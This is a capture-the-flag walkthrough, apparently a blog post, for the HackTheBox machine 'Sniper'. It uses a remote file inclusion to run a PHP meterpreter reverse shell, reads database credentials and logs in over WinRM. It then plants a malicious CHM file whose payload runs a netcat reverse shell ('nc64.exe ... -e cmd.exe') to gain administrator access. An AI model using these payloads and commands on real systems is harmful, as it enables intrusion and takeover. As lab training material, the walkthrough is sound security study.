Today we are going to crack a machine called Sniper. It was created by MinatoTW and felamos. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
·
Network Scanning
o
Nmap Scan
·
Enumeration
o
Browsing HTTP Service
o
Enumerating parameters in URL
o
Enumerating RFI
·
Exploitation
o
Exploiting RFI to get meterpreter
o
Enumerating Database credentials
o
Enumerating Users
o
Enumerating Local Services
o
Reading User Flag
·
Privilege Escalation
o
Uploading netcat
o
Crafting malicious CHM file
o
Uploading malicious CHM
o
Executing CHM file to get root
o
Reading the Root Flag
Walkthrough
Network Scanning
To Attack any machine, we need the IP Address. Machine
hosted on HackTheBox have a static IP Address.
IP Address assigned: 10.129.1.147
Now that we have the IP Address. We need to enumerate open
ports on the machine. For this, we will be running a nmap scan.
nmap -sC -sV 10.129.1.147
The Nmap Version scan quickly gave us some great
information. It positively informed that the following ports and services are
running: HTTP (80), SMB (135, 139, 445).
Enumeration
We had two options here. One was to enumerate the HTTP
service and another was to enumerate the SMB service. We started to enumerate
the HTTP service first.
http://10.129.1.171
Here we had a simple HTML page with a bunch of buttons. The
User Portal is the only one functional.
http://10.129.1.171/blog/index.php
Enumerating father got us to the blog page of website.
Tinkering around we clicked on Language button as shown in the image below.
http://10.129.1.171/blog/?lang=blog-en.php
view-source:http://10.129.1.171/blog/?lang=windows/win.ini
Since this is a Windows Based Machine, we tried to browse a
windows file. At first, we were unable to read it but as soon as we took a look
at the source code of the webpage, we found the contents of /windows/win.ini.
mkdir /tmp/share
chmod 555 /tmp/share
chown -R nobody:nogroup /tmp/share
echo “Welcome to Hacking Articles” >
/tmp/share/text.txt
We see that it can read a file located on the machine. But
can it also locate and read the files that are shared in the network. That's
right we are checking if it is an RFI vulnerability.
For that we need configure the SMB so that the target
machine can read file from it. We created a share folder inside the tmp directory
and changed its permission to read only. Then we changed its ownership to nobody
so that it can be accessed. At last, we created a text file inside the share
folder.
nano /etc/samba/smb.conf
service smbd restart
We also need to make some changes in the smb.conf file. We
have to change the path and some other configurations shown in the image below.
Restart the service after updating the configurations.
view-source:http://10.129.1.171/blog/?lang=\\10.10.14.64\share\test.txt
We try to read this remote file from the URL and lang
parameter. We can read the contents of a shared text file. This is a confirmed
case of RFI.
Exploitation
Now time to pop a shell through this RFI. We crafted a windows-based
payload using MSFPC. MSFPC creates two files. One is the payload and another is
a run command or rc file.
msfpc pc 10.10.14.64
We transfer the payload file to the share folder we created
in the tmp directory.
cp php-meterpreter-staged-reverse-tcp-443.php /tmp/share/
Now we execute the run command or rc file on our local
machine and sit back and relax. It will set the appropriate LHOST and LPORT and
other commands that are required.
msfconsole -q -r
‘/root/php-meterpreter-staged-reverse-tcp-443-php.rc’
Next, we execute the payload through the web browser by
entering the path of the payload file in the lang parameter as shown in the
image below.
http://10.129.1.171/blog/?lang=\\10.10.14.64\share\php-meterpreter-staged-reverse-tcp-443.php
As soon as the payload is executed, we get a meterpreter
session on the target machine. We enumerate about the session using sysinfo and
pwd command. Our shell landed in C:\inetpub\wwwroot\blog directory. We started
to look around and in the wwwroot directory we found the user folder. We
checked the user folder to find a db.php file. Upon reading the db.php file we
see that we have successfully enumerated database password.
sessions 1
sysinfo
pwd
cd user
cat db.php
To hunt for the username, we traversed into the Users Directory.
here we found Chris User. We tried entering the Chris User's directory. We couldn’t
get in.
cd C:\\Users
cd Chris
Since there are db credentials, there must be a service
running associated with it. We enumerate using netstat.
We found a service running on port 5985
netstat -ano
We forwarded the remove service on our local machine using
portfwd command.
portfwd add -p 5985 -l 5985 -r 127.0.0.1
Now using Chris as username and the password we got we tried
to log in on the service that we forwarded to our local port. We got in. We
checked the Desktop of Chris User. We found the user flag.
Privilege Escalation
To elevate privileges, we started enumerating different
directories. This is when we found the Docs directory inside C:\ drive. Inside
the Docs directory there was a note.
It said:
Hi Chris,
Your php skillz
suck. Contact yamitenshi so that he teaches you how to use it and after that
fix the website as there are a lot of bugs on it. And I hope that you've
prepared the documentation for our new app. Drop it here when you're done with
it.
Thats bad luck for Chris. But php is not that easy when
you get into it.
Well, the CEO is talking about some documentation. Let's see
if we find some. While enumerating Chris's file we see that he did indeed was
creating a set of instructions and we found a chm file by the name of
instructions inside Chris's Downloads folder. For those who don’t know chm
files are help files that we used to get on smashing F1 keys on certain
applications. Now we need to infect that chm file or replace it with a
malicious chm file so as to elevate privileges.
evil-winrm -i 127.0.0.1 -u chris -p '36mEAhz/B8xQ~2VM'
cd C:\\Users\Chris\Desktop
cat user.txt
cd C:\Docs
cat note.txt
In any case we will be needing netcat on windows so why not
transfer it. We just made a directory by the name of ignite and uploaded the
nc64.exe file to that target machine through meterpreter.
mkdir ignite
cd ignite
upload /root/Downloads/nc64.exe
Now we searched for some time to find a way to create a
malicious chm file. We got to the Out-CHM.ps1 PowerShell script part of the
Nishang Toolkit. It can be used for this trick. We downloaded the Out-CHM
script to our system. We tried to do this on Kali but we were getting some
errors and decided to do this on Windows. In payload we added the command to
start nc64.exe that we just uploaded and create a connection to our local
machine at port 5555. The Out-CHM script converted this into the doc.chm file.
powershell -ep bypass
Import-Module .\Out-CHM.ps1
Out-CHM -Payload "C:\raj\nc64.exe 10.10.14.64 5555
-e cmd.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
We transferred the doc.chm file to target machine similar to
the way we transferred the nc64.exe file.
Invoke-WebRequest -Uri http://10.10.14.64/doc.chm
-OutFile c:\docs\doc.chm
Before executing the malicious chm file, we stated a netcat listener
at port 5555. Then we executed the chm payload and we got ourselves an
Administrator Level Access. We read the root flag to conclude this machine.
nc -lvp 5555
cd C:\User\Administrator\Desktop
cat root.txt
0 comments:
Post a Comment